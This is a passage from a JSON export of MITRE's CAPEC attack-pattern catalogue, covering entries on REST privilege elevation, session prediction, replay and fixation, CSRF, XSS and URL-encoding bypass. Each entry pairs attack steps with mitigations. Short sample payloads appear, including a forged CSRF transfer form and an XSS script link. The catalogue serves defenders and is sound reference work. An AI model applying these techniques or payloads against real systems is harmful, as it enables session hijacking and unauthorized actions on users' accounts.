MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Name, Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Utilizing REST\'s Trust in the System Resource to Register Man in the Middle",{"Date":"2019-09-30"}]}},"58":{"ID":"58","Name":"Restful Privilege Elevation","Abstraction":"Detailed","Status":"Draft","Description":"Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL\'d and the application\'s service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1"},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"515"}}]},"Prerequisites":{"Prerequisite":"The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete."},"Skills_Required":{"Skill":["It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side","Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose"]},"Example_Instances":{"Example":"The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"267"},{"CWE_ID":"269"}]},"References":{"Reference":{"External_Reference_ID":"REF-463"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"59":{"ID":"59","Name":"Session Credential Falsification through Prediction","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"196"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find Session IDs] The attacker interacts with the target host and finds that session IDs are used to authenticate users.","Technique":["An attacker makes many anonymous connections and records the session IDs assigned.","An attacker makes authorized connections and records the session tokens or credentials issued."]},{"Step":"2","Phase":"Explore","Description":"[Characterize IDs] The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.","Technique":["Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.","Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs","Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation."]},{"Step":"3","Phase":"Experiment","Description":"[Match issued IDs] The attacker brute forces different values of session ID and manages to predict a valid session ID.","Technique":"The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match."},{"Step":"4","Phase":"Exploit","Description":"[Use matched Session ID] The attacker uses the falsified session ID to access the target system.","Technique":["The attacker loads the session ID into their web browser and browses to restricted data or functionality.","The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality."]}]},"Prerequisites":{"Prerequisite":["The target host uses session IDs to keep track of the users.","Session IDs are used to control access to resources.","The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time)."]},"Skills_Required":{"Skill":["There are tools to brute force session ID. Those tools require a low level of knowledge.",{"Level":"Low"},"Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Use a strong source of randomness to generate a session ID.","Use adequate length session IDs","Do not use information available to the user in order to generate session ID (e.g., time).","Ideas for creating random numbers are offered by Eastlake [RFC1750]","Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format."]},"Example_Instances":{"Example":["Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969","mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID\'s using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID\'s and bypass authentication when these session ID\'s are used for authentication. See also: CVE-2001-1534"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"330"},{"CWE_ID":"331"},{"CWE_ID":"346"},{"CWE_ID":"488"},{"CWE_ID":"539"},{"CWE_ID":"200"},{"CWE_ID":"6"},{"CWE_ID":"285"},{"CWE_ID":"384"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"18","Entry_Name":"Credential/Session Prediction"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Session Prediction"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"60":{"ID":"60","Name":"Reusing Session IDs (aka Session Replay)","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker interacts with the target host and finds that session IDs are used to authenticate users."},{"Step":"2","Phase":"Explore","Description":"The attacker steals a session ID from a valid user."},{"Step":"3","Phase":"Exploit","Description":"The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID\'s original owner."}]},"Prerequisites":{"Prerequisite":["The target host uses session IDs to keep track of the users.","Session IDs are used to control access to resources.","The session IDs used by the target host are not well protected from session theft."]},"Skills_Required":{"Skill":["If an attacker can steal a valid session ID, they can then try to be authenticated with that stolen session ID.",{"Level":"Low"},"More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing their valid session ID.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Always invalidate a session ID after the user logout.","Setup a session time out for the session IDs.","Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate adversary in the middle attacks (CAPEC-94).","Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.","Encrypt the session data associated with the session ID.","Use multifactor authentication."]},"Example_Instances":{"Example":["OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428","Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user\'s answer or forward URLs. See also: CVE-2002-0258"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"294"},{"CWE_ID":"290"},{"CWE_ID":"346"},{"CWE_ID":"384"},{"CWE_ID":"488"},{"CWE_ID":"539"},{"CWE_ID":"200"},{"CWE_ID":"285"},{"CWE_ID":"664"},{"CWE_ID":"732"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1134.001","Entry_Name":"Access Token Manipulation:Token Impersonation/Theft"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1134.002","Entry_Name":"Access Token Manipulation:Create Process with Token"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.004","Entry_Name":"Use Alternate Authentication Material:Web Session Cookie"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"}]}},"61":{"ID":"61","Name":"Session Fixation","Abstraction":"Detailed","Status":"Draft","Description":"The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Setup the Attack] Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.","Technique":["The attacker chooses a predefined identifier that they know.","The attacker creates a trap session for the victim."]},{"Step":"2","Phase":"Experiment","Description":"[Attract a Victim] Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim\'s browser. This is known as fixating the session. The session identifier can be introduced into the victim\'s browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.","Technique":["Attackers can put links on web sites (such as forums, blogs, or comment forms).","Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.","Attackers can email attack URLs to potential victims through spam and phishing techniques."]},{"Step":"3","Phase":"Exploit","Description":"[Abuse the Victim\'s Session] Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.","Technique":["The attacker loads the predefined session ID into their browser and browses to protected data or functionality.","The attacker loads the predefined session ID into their software and utilizes functionality with the rights of the victim."]}]},"Prerequisites":{"Prerequisite":["Session identifiers that remain unchanged when the privilege levels change.","Permissive session management mechanism that accepts random user-generated session identifiers","Predictable session identifiers"]},"Skills_Required":{"Skill":["Only basic skills are required to determine and fixate session identifiers in a user\'s browser. Subsequent attacks may require greater skill levels depending on the attackers\' motives.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":["There are no indicators for the server since a fixated session identifier is similar to an ordinarily generated one. However, too many invalid sessions due to invalid session identifiers is a potential warning.","A client can be suspicious if a received link contains preset session identifiers. However, this depends on the client\'s knowledge of such an issue. Also, fixation through Cross Site Scripting or hidden form fields is usually difficult to detect."]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.","Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.","Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult."]},"Example_Instances":{"Example":["Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim\'s account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.","An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user\'s browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"384"},{"CWE_ID":"664"},{"CWE_ID":"732"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"37","Entry_Name":"Session Fixation"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Session fixation"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-601","Section":"Testing for Session Fixation"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"62":{"ID":"62","Name":"Cross Site Request Forgery","Abstraction":"Standard","Status":"Draft","Description":"An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users\' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user\'s system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \\"riding\\" the existing session cookie.","Alternate_Terms":{"Alternate_Term":{"Term":"Session Riding"}},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"21"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Explore target website] The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.","Technique":["Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server","Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server","View HTML source of web pages that contain links or buttons that perform actions of interest."]},{"Step":"2","Phase":"Experiment","Description":"[Create a link that when clicked on, will execute the interesting functionality.] The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.","Technique":["Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)","Create a form that will submit a POST request (e.g. <form method=\\"POST\\" action=\\"https://www.somebank.com/members/transfer.asp\\"><input type=\\"hidden\\" Name=\\"to\\" value=\\"012345678901\\"/><input type=\\"hidden\\" Name=\\"amt\\" value=\\"10000\\"/><input type=\\"submit\\" src=\\"clickhere.jpg\\"/></form>"]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to click on link] Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.","Technique":["Execute a phishing attack and send the user an e-mail convincing them to click on a link.","Execute a stored XSS attack on a website to permanently embed the malicious link into the website.","Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.","Include the malicious link on the attackers\' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site."]}]},"Skills_Required":{"Skill":["The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.","Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.","Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.","In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context."]},"Example_Instances":{"Example":{"p":["While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.","The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim\'s account.","The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"352"},{"CWE_ID":"306"},{"CWE_ID":"664"},{"CWE_ID":"732"},{"CWE_ID":"1275"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"09","Entry_Name":"Cross-Site Request Forgery"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Site Request Forgery (CSRF)"}]},"References":{"Reference":[{"External_Reference_ID":"REF-62"},{"External_Reference_ID":"REF-602","Section":"Testing for Cross Site Request Forgery"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Alternate_Terms, Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Cross Site Request Forgery (aka Session Riding)",{"Date":"2017-01-09"}]}},"63":{"ID":"63","Name":"Cross-Site Scripting (XSS)","Abstraction":"Standard","Status":"Draft","Description":"An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users\' privilege level. An attack of this type exploits a programs\' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"242"},{"Nature":"CanPrecede","CAPEC_ID":"107"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.","Use a proxy tool to record results of manual input of XSS probes in known URLs.","Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.","Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines.",{"Level":"Low"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Session tokens for specific host","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":{"p":["Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:","When the user clicks the link, the appended script also executes on the local user\'s machine."],"div":["<a href=\\"www.exampletrustedsite.com?Name=<script>maliciousscript<\/script>\\">Trusted Site</a>",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"20"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"08","Entry_Name":"Cross-Site Scripting"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Site Scripting (XSS)"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Examples-Instances, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Simple Script Injection",{"Date":"2017-05-01"}]}},"64":{"ID":"64","Name":"Using Slashes and URL Encoding Combined to Bypass Validation Logic","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker accesses the server using a specific URL."},{"Step":"2","Phase":"Experiment","Description":"The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly."},{"Step":"3","Phase":"Exploit","Description":"The attacker crafts a malicious URL string request and sends it to the 